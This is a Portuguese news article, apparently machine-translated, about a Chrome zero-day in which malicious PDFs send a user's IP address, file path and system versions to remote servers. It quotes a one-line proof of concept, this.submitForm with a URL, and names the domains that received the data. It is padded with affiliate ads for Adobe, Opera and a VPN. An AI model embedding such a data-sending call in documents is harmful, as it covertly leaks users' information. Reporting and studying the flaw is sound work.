Bug do Chrome permite que hackers coletem dados do usuário por meio de arquivos PDF

How to effectively deal with bots on your site? The best protection against click fraud.
  • O EdgeSpot descobriu uma vulnerabilidade intrigante de dia zero explorando documentos PDF no Chrome.
  • Esta vulnerabilidade pode prejudicá-lo ao coletar dados confidenciais em seu PC.
  • Explore nosso Página da web e nuvem para obter mais informações sobre outras ferramentas e serviços.
  • Se você estiver interessado em navegadores, fornecemos muitas informações sobre eles em nosso Hub de navegadores.
Bug do Chrome permite que hackers coletem dados do usuário de seus arquivos PDF
Que tal usar o melhor gerenciador de documentos?
Torne todos os seus documentos acessíveis e seguros usando Adobe Acrobat Reader. Esta ferramenta de gerenciamento de documentos também permitirá que você assine e crie formulários oficiais para economizar seu tempo de trabalho. Obtenha-o para o seu PC e você será capaz de:
  • Abra, imprima e edite todos os seus PDFs e outros tipos de arquivo
  • Preencher formulários PDF mais facilmente
  • Mantenha seus documentos essenciais criptografados

Obtenha todos os aplicativos a um preço especial!

O software de gerenciamento de documentos Nr.1 ​​do mundo agora está com um ótimo preço, então corra!

instagram story viewer

Serviço de detecção de exploração que EdgeSpot descobriu um intrigante cromada vulnerabilidade de dia zero explorando documentos PDF.

A vulnerabilidade permite que os invasores colher dados sensíveis usando documentos PDF maliciosos abertos no Chrome.

Assim que a vítima abre os respectivos arquivos PDF no Google Chrome, um programa malicioso começa a trabalhar em segundo plano, coletando dados do usuário.

Os dados são então encaminhados para o servidor remoto que está sendo controlado pelos hackers. Você pode estar se perguntando quais dados estão sendo sugados pelos invasores, eles têm como alvo os seguintes dados em seu PC:

  • endereço de IP
  • Caminho completo do arquivo PDF no sistema
  • Versões do sistema operacional e do Chrome

Cuidado com arquivos PDF repletos de malware

Especialistas visto aquele dos dois domínios readnotify [.] com ou burpcollaborator [.] net estava recebendo os dados.

Eles revelaram que os invasores estão usando o this.submitForm () PDF Javascript API para coletar informações confidenciais dos usuários.

Nós o testamos com um PoC mínimo, uma chamada de API simples como this.submitForm (‘ http://google.com/test’) fará com que o Google Chrome envie os dados pessoais para google.com.

Esse bug do Chrome estava sendo explorado por dois conjuntos distintos de arquivos PDF maliciosos, ambos circularam em outubro de 2017 e setembro de 2018, respectivamente.

Notavelmente, os dados coletados podem ser usados ​​pelos invasores para ajustar os ataques no futuro. Os relatórios sugerem que o primeiro lote de arquivos foi compilado usando o serviço de rastreamento de PDF do ReadNotify.

Os usuários podem utilizar o serviço para controlar as visualizações do usuário. EdgeSpot não compartilhou nenhum detalhe sobre a natureza do segundo conjunto de arquivos PDF.

Dica rápida: mude seu navegador para Opera

Nestes tempos difíceis, somos atacados com malware, phishing e trojans em cada etapa, portanto, temos que estar muito mais vigilantes e permanecer protegidos.

E como este é um problema específico do Chrome, você pode evitar essa ameaça e todas as outras com um navegador orientado para a segurança, como Ópera.

Este navegador vem com um bloqueador de anúncios integrado que não apenas elimina essas distrações, mas também bloqueia scripts analíticos, pixels de rastreamento e métodos para coletar seus dados.

E se você quiser ter certeza absoluta de que está longe de qualquer perigo, fique atrás do VPN serviço 100% gratuito para uso por tempo ilimitado.

Ópera

Ópera

O Opera oferece a proteção perfeita contra ameaças com o bloqueador de anúncios integrado e serviço VPN de graça!

Pegue de graça
Visite o site

Como posso ficar protegido contra vulnerabilidades de PDF?

Baixe Adobe Acrobat PRO

Adobe Acrobat PRO

Adobe e Chrome são uma boa combinação quando se trata de lidar com arquivos PDF. Ao instalar a extensão Adobe para Chrome, você pode revisar e manipular PDFs de acordo com sua preferência, sem sair de seu navegador favorito.

Apesar de sua estrutura robusta, malware oculto em arquivos PDF pode não ser detectado se você estiver usando a versão padrão do Reader.

A versão profissional é recomendada para garantir sua proteção e manter seus dados longe de hackers.

Embora não seja gratuito, o preço que você pagará é bastante pequeno para a infinidade de recursos adicionais que você desfrutará, incluindo a segurança aprimorada de seus arquivos PDF.

Há também uma avaliação gratuita de 7 dias incluída para que você possa ter uma amostra da experiência Pro completa antes de fazer a compra.

Adobe Acrobat PRO

Adobe Acrobat PRO

Fique longe de malware baixando Adobe Acrobat PRO. Tem muito mais recursos do que a versão gratuita e mantém seus dados seguros.

Teste grátis
Visite o site

Caso queira estar seguro ao navegar na Internet, você precisará obter uma ferramenta totalmente dedicada para proteger sua rede. Instale agora o acesso privado à Internet e proteja-se. Ele protege seu PC de ataques durante a navegação, mascara seu endereço IP e bloqueia todos os acessos indesejados.


O serviço de detecção de Exploit EdgeSpot queria alertar os usuários do Chrome sobre os riscos potenciais porque o patch não era esperado para ser lançado em um futuro próximo.

O EdgeSpot relatou ao Google sobre a vulnerabilidade no ano passado e a empresa prometeu lançar um patch no final de abril.

No entanto, você pode considerar o uso de uma solução alternativa temporária para o problema, exibindo localmente os documentos PDF recebidos usando outro aplicativo leitor.

Como alternativa, você também pode abrir seus documentos PDF no Chrome, desconectando seus sistemas da Internet.

perguntas frequentes

  • Sim. Mas se você quiser uma seleção mais ampla, explore nossas principais escolhas para cromadaprivacidade extensões em este guia completo.

  • Taqui estão várias extensões que permitem PDFs em processamento. Verificar fora nosso excelente guia sobre as melhores extensões de PDF para o Chrome.

  • Não funciona, mas você pode ativá-lo rapidamente. Aqui está o nosso guia completo sobre como habilitar o gerador de código QR no Chrome.

Teachs.ru
Zepto ransomware está de volta, o Windows Defender não pode bloqueá-lo

Zepto ransomware está de volta, o Windows Defender não pode bloqueá-loRansomwareCíber Segurança

Zepto ransomware é um programa muito sorrateiro que já incomoda os usuários do Windows há algum tempo. Detectado pela primeira vez em julho, parece que esse malware se tornou mais ativo desde o iní...

Consulte Mais informação
Endereço IP da AT&T comprometido ou hackeado? Aqui está o que fazer

Endereço IP da AT&T comprometido ou hackeado? Aqui está o que fazerEndereço De IpPrivacidadeVpnCíber Segurança

Se você é um cliente da AT&T, provavelmente já ouviu falar sobre endereços IP comprometidos ou hackeados. Você pode até receber uma ligação um dia informando sobre o seu IP comprometido.O cenár...

Consulte Mais informação
A VPN pode ser rastreada pelo ISP? Qual é a melhor VPN indetectável?

A VPN pode ser rastreada pelo ISP? Qual é a melhor VPN indetectável?VpnCíber Segurança

Seu ISP pode ver exatamente o que você está fazendo online, a qualquer momento, exceto para dados cuidadosamente criptografados por sua VPN ou um protocolo HTTPS.É sabido que usar uma VPN é uma das...

Consulte Mais informação
ig stories viewer